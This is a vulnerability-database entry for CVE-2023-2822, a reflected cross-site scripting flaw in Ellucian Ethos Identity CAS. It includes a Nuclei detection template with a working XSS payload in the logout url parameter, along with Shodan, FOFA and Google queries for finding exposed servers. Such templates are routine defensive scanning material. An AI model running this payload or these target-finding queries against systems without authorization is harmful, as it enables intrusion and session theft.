Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2822
HistoryJul 05, 2023 - 6:51 a.m.

Ellucian Ethos Identity CAS - Cross-Site Scripting

2023-07-0506:51:44
ProjectDiscovery
github.com
7
cve2023
cross-site scripting
ellucian
upgrade
version 5.10.5
remote attack

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.1 Medium

AI Score

Confidence

High

0.057 Low

EPSS

Percentile

93.4%

A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
id: CVE-2023-2822

info:
  name: Ellucian Ethos Identity CAS - Cross-Site Scripting
  author: Guax1
  severity: medium
  description: |
    A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component.
  reference:
    - https://medium.com/@cyberninja717/685bb1675dfb
    - https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb
    - https://vuldb.com/?ctiid.229596
    - https://vuldb.com/?id.229596
    - https://github.com/cberman/CVE-2023-2822-demo
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2822
    cwe-id: CWE-79
    epss-score: 0.05264
    epss-percentile: 0.9303
    cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ellucian
    product: ethos_identity
    shodan-query:
      - html:"Ellucian Company"
      - http.html:"ellucian company"
    fofa-query: body="ellucian company"
    google-query: "login with ellucian ethos identity"
  tags: cve2023,cve,cas,xss,ellucian

http:
  - method: GET
    path:
      - '{{BaseURL}}/cas/logout?url=https://oast.pro"><img%20src=x%20onerror=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'Identity Server'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203ae64bd3cc36ccd3c52debfd02f43bf19862246f1fd8ef1b705625959d341f8a022100c90f789a33e2667c2fe0f33bd9110d6cdae42c665fc455452870f4c553772a28:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.1 Medium

AI Score

Confidence

High

0.057 Low

EPSS

Percentile

93.4%

Related for NUCLEI:CVE-2023-2822